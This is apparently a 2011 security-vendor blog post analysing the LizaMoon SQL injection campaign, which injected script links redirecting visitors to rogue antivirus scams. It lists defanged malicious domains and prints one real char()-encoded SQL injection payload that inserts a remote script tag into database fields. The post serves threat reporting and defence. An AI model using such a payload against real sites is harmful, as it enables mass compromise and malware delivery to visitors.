LizaMoon
The LizaMoon mass-injection is a SQL injection attack that inserts the following line into the code of the page:
According to a Google Search, over 28,000 226,000 URLs have been compromised. This includes several iTunes URLs, as you can see below:
And here is the injected code at one of those iTunes URLs:
The way iTunes works is that it downloads RSS/XML feeds from the publisher to update the podcast and list of available episodes. We believe that these RSS/XML feeds have been compromised with the injected code. The good thing is that iTunes encodes the script tags, which means that the script doesn't execute on the user's computer. So good job, Apple.
The URL that is injected is unavailable right now, but the server is still up and running, so that could change at any time. While it was up, the script contained simple JavaScript code that redirected the user to a well-known Rogue AV site: hxxp://defender-uqko.in. That site is also unavailable right now, so we don't have the actual binary analysis information available yet.
The domain lizamoon.com was registered three days ago with clearly fake information:
We'll keep monitoring this mass-injection attack and provide updated information as it's available.
UPDATE1: A Google Search now returns over 226,000 results. Do note that this is a count of unique URLs, not infected hosts. Still, it makes it one of the bigger mass-injection attacks we have ever seen.
UPDATE2: We have been monitoring the attack since it came out and noticed that the number of the compromised URLs is still increasing, 380,000 URLs so far, moreover, more domains started to be involved except for lizamoon.com.
Update on LizaMoon mass-injection and Q&A
The LizaMoon mass-injection campaign is still ongoing and more than 500,000 pages have a script link to lizamoon.com according to preliminary Google Search results. We have also been able to identify several other URLs that are injected in the exact same way, so the attack is even bigger than we originally thought. All in all, a search on Google returns more than 1,500,000 results that have a link with the same URL structure as the initial attack. Google Search results aren't always great indicators of how prevalent or widespread an attack is as it counts each unique URL or page, not domain or site, but it does give some indication of the scope of the problem if you look at how the numbers go up or down over time.
Additional injected URLs
Here's a list of domains that we have identified so far (with help from blog comment posters; thanks for that guys!).
hxxp://lizamoon.com/ur.php
hxxp://tadygus.com/ur.php
hxxp://alexblane.com/ur.php
hxxp://alisa-carter.com/ur.php
hxxp://online-stats201.info/ur.php
hxxp://stats-master111.info/ur.php
hxxp://agasi-story.info/ur.php
hxxp://general-st.info/ur.php
hxxp://extra-service.info/ur.php
hxxp://t6ryt56.info/ur.php
hxxp://sol-stats.info/ur.php
hxxp://google-stats49.info/ur.php
hxxp://google-stats45.info/ur.php
hxxp://google-stats50.info/ur.php
hxxp://stats-master88.info/ur.php
hxxp://eva-marine.info/ur.php
hxxp://stats-master99.info/ur.php
hxxp://worid-of-books.com/ur.php
hxxp://google-server43.info/ur.php
hxxp://tzv-stats.info/ur.php
hxxp://milapop.com/ur.php
hxxp://pop-stats.info/ur.php
hxxp://star-stats.info/ur.php
hxxp://multi-stats.info/ur.php
hxxp://google-stats44.info/ur.php
hxxp://books-loader.info/ur.php
hxxp://google-stats73.info/ur.php
hxxp://google-stats47.info/ur.php
hxxp://google-stats50.info/ur.php
List updated: 4/1/2011 12:16pm PT
The domain stats-master111.info was registered on October 21, 2010 which could mean the first attack happened then but we don't have any evidence of that. The first confirmed case that we know of is from December 2010, but we didn't make the connection to LizaMoon until today. The last domain, milapop.com, was registered today.
SQL Injection
We were able to find more information about the SQL Injection itself (thanks Peter) and the command is par for the course when it comes to SQL Injections. Here's one example:
+update+Table+set+FieldName=REPLACE(cast(FieldName+as+varchar(8000)),cast(char(60)%2Bchar(47)
%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)
%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)
%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)
%2Bchar(47)%2Bchar(103)%2Bchar(111)%2Bchar(111)%2Bchar(103)%2Bchar(108)%2Bchar(101)%2Bchar(45)
%2Bchar(115)%2Bchar(116)%2Bchar(97)%2Bchar(116)%2Bchar(115)%2Bchar(53)%2Bchar(48)%2Bchar(46)
%2Bchar(105)%2Bchar(110)%2Bchar(102)%2Bchar(111)%2Bchar(47)%2Bchar(117)%2Bchar(114)%2Bchar(46)
%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)
%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000)),cast(char(32)
+as+varchar(8)))--
More information is available over on Stackoverflow.com.
Injected code
Here is the content of an example ur.php file. The content isn't even obfuscated which is somewhat unusual. All the code does is a redirect to a rogue AV site. We've seen the scripts change over time to redirect to several different rogue AV sites:
What happens to the user?
We wrote in an earlier post that the payload site doesn't work properly, but further testing shows that it does and we created a video showing what happens if a user visits a website that contains the injected code. The video is available at the end of this post. The user only gets the malicious code once per IP address, so if you've already visited the site you won't get the code again. This is something we see often in attacks, especially in exploit kits.
The Rogue AV software that is installed is called Windows Stability Center and the file that is downloaded is currently detected by 13/43 anti-virus engines according to VirusTotal.
The software then displays a warning that there are lots of problems on your PC. To fix them you have to pay for the full version of the application. Very traditional rogue AV scam. Dancho Danchev has some more information on his blog.
Where are users coming from?
We looked at reports of traffic to lizamoon.com as indicated by data collected by the Websense Threatseeker Network and here's a graph of where those users are located.
So what about iTunes?
We received blog comments from our readers (keep them coming, we read them all!) and some were critical of our use of iTunes in the title of the previous post and how we stated that iTunes URLs had been compromised, but the script neutered by Apple. All of what we stated was technically correct, but perhaps we didn't make it clear enough.
Every time there's a mass-injection like this, and there really hasn't been anything this big before, we try to identify larger systems and sites that have been affected to give some indication of how wide the attack has spread. And there are few systems out there bigger than iTunes, so when we saw that content on itunes.apple.com contained the injected link we wanted to make people aware of that, even if the script didn't work. It seems that some readers weren't too happy about that and argued that we could also say that Google Search was compromised because it also shows the injected code in search results. We don't really agree with that, but perhaps we shouldn't have highlighted it the way we did.
Questions & Answers about the LizaMoon mass-injection
Q: Why is this called LizaMoon?
A: One of the first domains we saw involved in this campaign was created on March 25, 2011 was called lizamoon.com.
Q: How many pages have been affected by this?
A: With the complications of search algorithms and how they count results it's hard to say. Google Search returns more than 1.5 million results. A Bing Search returns about 900,000 results but the same reservation about their algorithm and how they count results applies. We believe the number of sites infected are significantly smaller.
Q: How does the script get added to the compromised sites?
A: We're still looking into that. We know that it uses SQL Injection to do it and not XSS as some of our blog readers have suggested.
Q: How do you know it's using SQL Injection?
A: We have been contacted by people who have seen the code in their Microsoft SQL databases. Initially we only received reports of users running Microsoft SQL Server 2000 and 2005 being hit but since then we have also received reports of websites using Microsoft SQL Server 2008 being injected as well.
Q: Could this mean that there's a vulnerability in Microsoft SQL Server 2000 and 2005?
A: No. Everything points to that this is a vulnerability in a web application. We don't know which one(s) yet but SQL Injection attacks work by issuing SQL commands in unsanitized input to the server. That doesn't mean it's a vulnerability in the SQL Server itself, it means that the web application isn't filtering input from the user correctly.
Q: What happens when I visit a site that contains the injected script?
A: Your PC will get redirected to a rogue AV site, displaying fake information about your PC being infected.
Q: Will I get redirected over and over again if I visit a compromised site?
A: No, the script only redirects you once.
Q: When will the LizaMoon attack be over?
A: Not anytime soon. We're still seeing references to Gumblar, which was a mass-injection attack found in 2009.
Video
Below is a video showing what happens when a user visits a site that has the LizaMoon script injected.
Theo: http://community.websense.com/blogs/securitylabs/archive/2011/03.aspx